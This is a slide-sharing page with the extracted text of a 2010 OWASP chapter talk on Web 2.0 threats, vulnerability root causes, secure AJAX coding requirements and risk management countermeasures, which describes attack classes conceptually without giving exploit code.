cpkwan's picture
From cpkwan rss RSS  subscribe Subscribe

Web 2.0 threats, vulnerability analysis,secure web 2.0 application development and risk management 

Web 2.0 threats, vulnerability analysis,secure web 2.0 application development and risk management

 

 
 
Tags:  risk management software  application security  ajax security  web 20 security  owasp top 10 
Views:  146
Published:  November 08, 2011
 
0
download

Share plick with friends Share
save to favorite
Report Abuse Report Abuse
 
Related Plicks
Software Security Engineering

Software Security Engineering

From: mkja
Views: 232 Comments: 0

 
Business cases for software security

Business cases for software security

From: dsharman
Views: 491 Comments: 0
Business cases for software security
 
Telemarketing List

Telemarketing List

From: anon-583937
Views: 57 Comments: 0
Telemarketing List
 
Vulnerability Management for a Cyber Secure Corporate World

Vulnerability Management for a Cyber Secure Corporate World

From: egestalt
Views: 86 Comments: 0
Today's global organization with its technology landscape of networked servers, desktops and other hardware equipment and innumerable software applications is vulnerable to information thefts and cyber- attacks.
 
Enterprise Risk Management

Enterprise Risk Management

From: crberry
Views: 260 Comments: 0

 
Risk Management Plan

Risk Management Plan

From: csirn47
Views: 512 Comments: 0
Risk Management Plan
 
See all 
 
More from this user
RIM

RIM

From: cpkwan
Views: 261
Comments: 0

New consumers of digital lifestyle products

New consumers of digital lifestyle products

From: cpkwan
Views: 212
Comments: 0

Struts Live

Struts Live

From: cpkwan
Views: 3526
Comments: 0

CallCapture.com

CallCapture.com

From: cpkwan
Views: 423
Comments: 0

Danai Resume082009

Danai Resume082009

From: cpkwan
Views: 485
Comments: 0

Fraud Risk Management and Computer Security

Fraud Risk Management and Computer Security

From: cpkwan
Views: 238
Comments: 0

See all 
 
 
 URL:          AddThis Social Bookmark Button
Embed Thin Player: (fits in most blogs)
Embed Full Player :
 
 

Name

Email (will NOT be shown to other users)

 

 
 
Comments: (watch)
 
 
Notes:
 
Slide 1: Vulnerability Analysis, Secure Development and Risk Management of Web 2.0 Applications Marco Morana OWASP Cincinnati Chapter, November 2010 Meeting OWASP Copyright © 2010 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License. The OWASP Foundation http://www.owasp.org
Slide 2: What is OWASP? OWASP 2
Slide 3: Agenda For Today’s Presentation 1. 2. 3. 4. The Evolution of Web 2.0 Web 2.0 Vulnerability Analysis Building Secure Web 2.0 Applications Web 2.0 Risk Management OWASP 3
Slide 4: The Evolution of the Internet to Web 2.0 OWASP 4
Slide 5: General Web 2.0 Background  Can be defined as: “Web applications that facilitate interactive information sharing and collaboration, interoperability, and user-centered design on the World Wide Web” … the main characteristics of web 2.0 are: 1. Encourage user’s participation and collaboration through a virtual community of social networks/sites. Users can and add and update their own content, examples include Twitter and social networks such as Facebook, Myspace, LinkedIn, YouTube 2. Transcend from the technology/frameworks used AJAX, Adobe AIR, Flash, Flex, Dojo, Google Gears and others 3. Combine and aggregate data and functionality from different applications and systems, example include “mashups” as aggregators of client functionality provided by different in-house developed and/or third party services (e.g. web services, SaaS) OWASP 5
Slide 6: Web 2.0 As Evolution of Human Knowledge Source http://digigogy.blogspot.com/2009/02/digital-blooms-visual.html OWASP
Slide 7: Web 2.0 As Adoption By Businesses OWASP 7
Slide 8: How Web 2.0 Changes The Threat Landscape  Web 1.0 threats are amplified by the intrinsic nature of Web 2.0 such as expanded interaction model and use of both old and new Web 2.0 technologies, examples:  Social networks as target for attack users with malware, FaceBook is 350 Million users !  Web 2.0 prone to Web 1.0 vulnerabilities such as XSS, CSRF, Phishing, Injection Flaws  Web 2.0 enable more effective attacks because of sharing and integration between disparate systems, examples are:  Complexity of integration of different technologies and services, front-end/client and back-end/server  Rich client interfaces increase the attack surface and the likelihood of business logic attacks  Social networks facilitate information disclosure of confidential PII, examples are:  Abuse of user’s trust first-verify model by attackers  Sharing data model breaks boundaries of confidentiality, not clear boundaries between private vs. public, personal life vs. professional life OWASP
Slide 9: Web 2.O: Old Vulnerabilities And New Exploit Scenarios OWASP
Slide 10: Web 2.O Vulnerabilities OWASP 10
Slide 11: Top 50 WASC Threats and Top 10 OWASP Risks Especially Impacting Web 2.0 OWASP
Slide 12: WASC-23 XML INJECTION, WASC-29 XPATH INJECTION, OWASP A1: INJECTION FLAWS  WEB 2.0 EXPLOIT SCENARIOS:  XML INJECTION/POISONING  User-supplied input is inserted into XML without sufficient validation affecting the structure of the XML record and the tags (and not just content)  XPATH INJECTION  XPath injection is an attack to alter an XML query to achieve the attacker’s goals  JSON INJECTION  An attacker can force execution of malicious code by injecting malicious JavaScript code into the JSON (JavaScript Object Notation structure) on the client.  RSS FEED INJECTION  RSS feeds can consume un-trusted sources injected with XSS  WEB 2.0 KNOWN INCIDENT EXAMPLE:  WHID 2008-47: The Federal Suppliers Guide validates login OWASP credential in JavaScript -
Slide 13: WASC-08/OWASP A2: CROSS SITE SCRIPTING (XSS)  WEB 2.0 EXPLOIT SCENARIOS:  INSUFFICIENT LIMITS ON USER INPUT  Users are allowed to enter HTML data that can be potentially malicious (e.g. while creating contents such as networks, blogs or wikis)  Users have extensive control over user content including unsafe HTML tags that can be abused for XSS  INSUFFICIENT FILTERING FOR XSS DOM  XSS exposure is increased for Web 2.0 especially for XSS DOM since is used in RIA written in FLASH or Silverlight, Mashups and Widgets using DOM  AJAX increases the entry points for potential XSS injections  WEB 2.0 KNOWN INCIDENT EXAMPLE:  WHID 2008-32: Yahoo HotJobs XSS  Hackers exploiting an XSS vulnerability on Yahoo HotJobs to steal session cookies of victims OWASP
Slide 14: WASC-01: INSUFFICIENT AUTHENTICATION OWASP-A3: BROKEN AUTHENTICATION AND SESSION MANAGEMENT  WEB 2.0 EXPLOIT SCENARIOS:  WEAK PASSWORDS  User choice of simple-to-guess passwords and trivial password-reminder questions set by on-line site contributors  CLEAR TEXT PASSWORDS  Password stored in AJAX Widgets/Mashups sent and stored in clear outside the control of the host  INSUFFICIENT PASSWORD MANAGEMENT CONTROLS  Password recovery/reminders not protected from brute force attacks  SINGLE-SIGN-ON DESIGN FLAWS  Passwords stored in personalized homepage and in the desktop widget as “autologon feature” or in the cloud to SSO from the desktop  WEB 2.0 KNOWN INCIDENT EXAMPLE:  WHID 2009-2: Twitter Accounts of the Famous Hacked OWASP
Slide 15: WASC-09/OWASP A5: CROSS SITE REQUEST FORGERY (CSRF)  WEB 2.0 EXPLOIT SCENARIOS:  CSRF USING AJAX REQUESTS  XHR calls enable invisible queries of a web application by the client that user cannot visually validate for forgery  INSUFFICIENT BROWSER ENFORCEMENT OF SINGLE ORIGIN POLICY  Desktop widgets do not have the same SOA protection as browser applications and faciilitate CSRF  WEAK SESSION MANAGEMENT  Session expiration times are typically quite high, increasing the risk of session base attacks such as CSRF  Persistent session cookies are shared by Widgets increase the opportunities for CSRF attacks  WEB 2.0 KNOWN INCIDENT EXAMPLE:  WHID 2009-4: Twitter Personal Info CSRF -By exploiting a CSRF bug in Twitter, site owners can get Twitter profiles of their visitors. OWASP
Slide 16: WASC-21: INSUFFICIENT ANTI-AUTOMATION  WEB 2.0 EXPLOIT SCENARIOS:  AUTOMATIC SPREAD OF SPAM AND PHISHING LINKS  Spammers can automatically post links to increase the popularity ranking of site  Fraudsters can use automation to embed malicious links such as malicious advertisements for drive by download malware attacks  AUTOMATIC REGISTRATION OF USER ACCOUNTS  Scripts to automatically register web e-mail accounts in order to authenticate to other services/applications  AUTOMATIC EMBEDDING OF COMMANDS  Embedding commands for controlling botnet using RSS feeds, social networking sites  AUTOMATIC BUSINESS LOGIC EXPLOITS  Automatically bid on items to increase prices, resource exhaustion of available seats, buy and resale tickets  WEB 2.0 KNOWN INCIDENT EXAMPLE: OWASP  WHID 2007-65: Botnet to manipulate Facebook
Slide 17: Vulnerability Root Cause Analysis OWASP
Slide 18: WASC Classification of Root Causes Of Web 2.0 Vulnerabilities 1. 2. USER GENERATED CONTENT Ability of consumers to add and update their own content MASHUPS & WEB SERVICES Aggregation of data on the desktop through mashups and web services DATA CONVERGENCE No boundary between private and public information DIVERSITY OF CLIENT SOFTWARE Data and software functions available across many different technologies and environments COMPLEXITY & ASYNCHRONOUS OPERATION Increased user interaction, integration APIs lead to complexity one of which is AJAX OWASP 3. 4. 5.
Slide 19: Summary of Top Web 2.0 Security Threats VULNERABILITY V1: INSUFFICIENT AUTHENTICATION CONTROLS EXPLOIT SCENARIO V1.1 V1.2 V1.3 V1.4 WEAK PASSWORDS INSUFFICIENT ANTI-BRUTE FORCE CONTROLS CLEAR TEXT PASSWORDS SINGLE-SIGN-ON WEB 2.0 ROOT CAUSES W1 W2 W4 W5 – User contributed content – Mashups, – Diversity of client software, - Complexity V2: CROSS SITE SCRIPTING (XSS) V3: CROSS SITE REQUEST FORGERY (CSRF) V2.1 INSUFFICIENT LIMITS ON USER INPUT V3.1 CREDENTIAL SHARING BETWEEN GADGETS V3.2 CSRF USING AJAX REQUESTS V3.3 LENGTHY SESSIONS V4.1 PHONY WIDGETS V4.2 PHONY CONTENT USED FOR PHISHING V4.3 XSS EXPLOITED FOR PHISHING V5.1 SENSITIVE INFORMATION POSTED TO WEB 2.0 SITES V5.2 INFORMATION AGGREGATION IN SOCIAL NETWORKS V5.3 EASY RETRIEVAL OF INFORMATION THROUGH WEB SERVICES V6.1 XML INJECTION V6.2 XPATH INJECTION V6.3 JSON INJECTION V7.1 AUTHENTICATED USERS PUBLISH FRAUDULENT INFORMATION W1 – User contributed content W5 - Complexity & Asynchronous Operation W2 – Mashups, W4 – Diversity of client software W2 – Mashups, W4 – Diversity of client software W1 – User Contributed Content W1 – User contributed content W3 – Consumer and enterprise worlds convergence) W4 – Mashups & Web Services W4 – Mashups & Web Services, W5: Complexity & Asynchronous Operation W1 – User contributed content V4: PHISHING V5:INFORMATION LEAKAGE V6: INJECTION FLAWS V7:INFORMATION INTEGRITY V8:INSUFFICIENT ANTIAUTOMATION V8.1 WEB SPAM V8.2 AUTOMATIC OPENING OF USER ACCOUNTS V8.3 UNFAIR ADVANTAGE ON SITE W1 – User contributed content W2 – Mashup & Web Services Source www.secure-enterprise2.0.org OWASP
Slide 20: Building Secure Web 2.0 Applications OWASP 20
Slide 21: Making Application Security Visible… OWASP
Slide 22: Web 2.0 Security Engineering Essential Steps 1. Document Security Standards For Web 2.0 Document Web 2.0 technology security requirements (e.g. AJAX, FLASH) and enforce them at the beginning of the SDLC 2. Conduct Application Threat Modeling during design Examine the architecture of Web 2.0 application and all tiers for secure design of authentication-session management, authorizations, input validation, error handling-logging 3. Perform Secure Code Reviews On Web 2.0 Components/Frameworks Assure source code adherence to security coding standards Identify security bugs in both client (e.g. Widgets, AJAX) as well as servers (e.g. Web services, SOA) 4. Security test Web 2.0 components Security test cases for AJAX and Web Services, use the OWASP test guide test cases 5. Assess the whole Web. 2.0 applications for vulnerabilities Conduct final vulnerability assessment on whole Web 2.0 application (e.g. test for OWASP T10, WASC, SANS-25 OWASP vulnerabilities)
Slide 23: Security Touch Points For Web 2.0 using AGILE SDLC STEP 5: Final Web 2.0 Vulnerability Assessment 10. Release 1. Iteration Planning Meeting STEP 4: Security Tests For Web 2.0 Components 9. User Acceptance Testing (No Iteraction) STEP 1: Incorporate Web.20 Security Requirements 8. Incremental Integrated System Tests 7. Incorporate F/B & Continue Development (iter #N) 2. Begin Sprint # Requirements Iteration # 3. SPRINT Initiation, Design Discussion STEP 3: Secure Code Reviews @ End of Each Sprint Security Sprint Reviews 4. Review Use Cases and Storyboard 6. Demo Prototype & Gather FeedBack 5. Build & Deploy Prototype STEP 2: Secure Architecture Reviews/Threat Modeling OWASP
Slide 24: Secure Architecting AJAX In Web 2.0 Applications Client side business logic/state Backends Servces accessible from untrusted callers without server side security enforcements ESB can only be called by trusted internal systems AJAX endpoint call backend directly AJAX call associated with active sessions/ server side Secure Communications Authentication & session Management, Access Controls Input validations Error Handling/Logging OWASP
Slide 25: Secure Code Reviews Of Web 2.0 Applications OWASP
Slide 26: “TOP 10” Secure Coding Requirements for AJAX 1. Validate data on the server side for all data entry points and URLs of AJAX calls for code injection vulnerabilities such as Javascript injection, JSON injection, DOM injection, XML injection. Use JSON.parse to parse objects before calling eval() if used 2. Make sure business logic is enforced on the server not by client side logic ! using server parameters 3. Validate a well formatted XML against allowed specification of values at server side 4. Enforce authentication before any XMLHTTPRequest (XHR) session. 5. Enforce authorization checks on data accessed through XHR 6. Add token to the URL and verify at server side for CSRF vulnerabilities via forging of dynamic script tags. 7. Do not store or cache sensitive data on the client such as passwords, sessionIDs, client javascript, Flash local shared object and Mozilla’s DOM storage 8. Avoid using dynamic <script> tags since there is no opportunity for data validation before execution 9. Always use POST method to send request as default 10. Do not use javascript alert() for error handling OWASP
Slide 27: Secure Testing Web 2.0 Client and Server Components OWASP
Slide 28: Web 2.O Risk Management OWASP 28
Slide 29: OWASP Risk Framework (used in OWASP T10) OWASP
Slide 30: Potential Web. 2.0 Attack Vectors And Targets Information Disclosure & Integrity Phishing, Drive by Download DOM XSS XML, JSON Injections JS Injection XSS, Malware Broken Auth and Session Mgmt CSRF Information Disclosure, DDOS XPATH & SQL injection OWASP
Slide 31: Web 2.0 Application Risk Framework Threat Agents Web 2.0 Users, Customers/ Employees Malicious Users, Fraudsters Malicious Users, Fraudsters Malicious Users, Fraudsters Misuses and Attack Vectors User shares private/confidential information, agents post confidential information Victim is targeted by phishing, download of phony widgets, clicking on malicious POSTS Attacker sends malicious data to the application’s interfaces Attacker uses leaks or flaws in the authentication or session management functions Security Weaknesses Inherent weaknesses in controlling user contributed content in social networks, blogs, IMs, private emails Social Engineering, Web 2.0 Vulnerabilities: XSS Security Controls/ Countermeasures Web 2.0 Social Networking Security Policies, Compliance, Monitoring, filtering, archiving, approval workflow for social site posts Consumer Education, Data Filtering, escape all untrusted data based on HTML content Filtering, parameterized API, ESAPI filtering APIs, white-list validations Follow Security Requirements For Secure Password Policies, Implement Locking, Disable “Auto-logons” Technical Impacts Loss of sensitive/ confidential data Business Impacts Reputation loss. Unlawful compliance fines Execute JS on client, install malware Loss of data, data alteration, denial of service/access Unauthorized access to data, functions Fraud, financial losses, reputation loss/defacements Public disclosure of XSSReputation damage Loss of CIA, legal and financial implications Web 2.0 Input Validation Vulnerabilities: XPATH injection, XML injection, JSON injection Web 2.0 Broken Auth and Session Mgmt Vulnerabilities Fraudsters Attacker creates forged HTTP requests and tricks a victim into submitting them Application post links, create accounts, game the application We 2.0 Cross Site Request Forgery Vulnerabilities Include the unique token in a hidden field. Can change data and functions on behalf of the user Can overflow process with spam, Enumerations Loss of CIA, fraud, denial of access Business Disruptions/losse s, reputational damage Automated Scripts/ Spam Bots Insufficient AntiAutomation Include CAPTCHA, ESAPI intrusion detection APIs OWASP
Slide 32: Web 2.0 Business App Example: Twitter  Company’s Customer Support offers help through twitter’s help account, Bank Of America Example OWASP
Slide 33: Managing Risks of Company’s Twitter  Twitter Application Security Vulnerabilities  Landing page for selecting twitter might be vulnerable to web 2.0 vulnerabilities  Countermeasure: Require a scan of web 2.0 vulnerabilities of the landing page hosting the link to twitter  Use of AJAX might introduce new source code vulnerabilities  Countermeasure: Validate existence of filtering for sanitization of malicious characters for XSS, XPATH, XML injection and mitigation of CSRF, sufficient anti-automation controls  Countermeasure: Validate compliance of source code with AJAX secure coding standards OWASP
Slide 34: Managing Risks of Company’s Twitter  Twitter Information Security And Compliance Risks  Customers can disclose confidential information by micro blogging to twitter’s company account  Countermeasure : Ask the user not to enter anything sensitive such as PII, SSN ACC# but his phone number  Company is not liable for user’s content posted to third party twitter and for twitter vulnerabilities  Countermeasure : Once the customer selects to go to twitter he will be presented a speed bump with notice of release of liability to user and to twitter  Content shared between enterprise customer support representatives (twitter agents) can leak customer’s confidential information such as PII, ACC#  Countermeasure : use a content enterprise social filtering and monitoring tool, agents moderate the content that is posted on twitter OWASP
Slide 35: QUESTIONS ANSWERS OWASP 35
Slide 36: Thanks for listening, further references  Ajax and Other "Rich" Interface Technologies  http://www.owasp.org/index.php/Ajax_and_Other_%22Rich%22_Int erface_Technologies  Vulnerability Scanners for Flash Components  http://www.owasp.org/index.php/Category:OWASP_Flash_Security_ Project  Web Application Vulnerability Scanners  http://samate.nist.gov/index.php/Web_Application_Vulnerability_Sca nners.html  Facebook Outs Hacker Krillos  http://threatpost.com/en_us/blogs/facebook-outs-hacker-kirllos051310?utm_source=Recent+Articles&utm_medium=Left+Sidebar+ Topics&utm_campaign=Web+Application+Security OWASP 36
Slide 37: Further references con’t  Facebook Now Trending As Phishing Target  http://threatpost.com/en_us/blogs/facebook-now-trendingphishing-target051310?utm_source=Recent+Articles&utm_medium=Left+Sideba r+Topics&utm_campaign=Web+Application+Security  Botnet Herders Can Command Via Twitter  http://threatpost.com/en_us/blogs/botnet-herders-can-nowcommand-twitter051310?utm_source=Recent+Articles&utm_medium=Left+Sideba r+Topics&utm_campaign=Web+Application+Security  OWASP TOP 10 Risks  http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Pro ject  Guide to Twitter Compliance  http://insights.socialware.com/ OWASP 37
Slide 38: Further references con’t  Web 2.0 Top 10 Web 2.0 Attack Vectors  http://www.net-security.org/article.php?id=949&p=4  Defending against the worst web based application vulnerabilities of 2010  http://www.slideshare.net/shreeraj/web-attacks-top-threats-2010  Security Concerns Hinder Adoption of Web 2.0 and Social Networking in Business  http://investor.mcafee.com/releasedetail.cfm?ReleaseID=511103  Web 2.0 a Top Security Threat in 2010, Survey Finds  http://pr.webroot.com/threat-research/ent/web-2security-survey-170210.html OWASP 38

   
Time on Slide Time on Plick
Slides per Visit Slide Views Views by Location